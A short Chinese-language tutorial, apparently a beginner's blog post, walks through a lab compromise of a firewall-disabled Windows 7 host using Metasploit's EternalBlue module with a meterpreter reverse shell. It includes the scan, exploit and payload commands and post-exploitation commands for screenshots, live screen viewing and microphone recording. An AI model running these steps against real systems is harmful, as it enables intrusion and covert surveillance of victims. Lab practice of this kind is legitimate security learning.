Metasploit入侵win7系统
一:实验环境
主机:安装有Metasploit的kali linux 操作系统
目标:已关闭防火墙的win7系统
二:获得信息
a.获得网络拓扑图
画出网络拓扑图,确定你和目标主机在同一局域网下。
b.获得主机ip和目标ip
1.主机ip:ifconifg
这里的eth0是你有线连接的ip地址,也是lhost。
2.目标ip:nmap -nsP 192.168.x.x/24
192.168.x.x/24,通过扫描得到与你相同网段下所有主机IP,加以区分后,最终得到rhost。
三:实施入侵
a.打开控制终端
输入:msfconsole
b.查找漏洞
控制台输入search platform:windows 7
这里我使用1037对应的漏洞攻击:控制台输入use exploit/windows/smb/ms17_010_eternalblue
c.进行配置
set payload/windows/meterpreter/reverse_tcp
set lhost 192.168.x.x
set rhost 192.168.x.x
set lport 2345
run
四:对主机进行操作
help命令可以查看有那些命令可以使用,下面是一些立竿见影的:
screenshot #这个是屏幕截图
screenshare #这个是实时获取另一主机屏幕内容
record_mic #开始录音
dir #查看目标主机所有文件
五:做个守法的好青年
可能有人会质疑了,你关闭了防火墙再去入侵,相当与没做啊!原谅我还只是个菜鸡中的菜鸡,等我哪一天会绕过防火墙了,我会再写一篇告诉你们的!!!还有,入侵不是给你个IP就行了,真实生活中,肯定有好多意外发生,但电脑的防火墙是可以主动关闭的。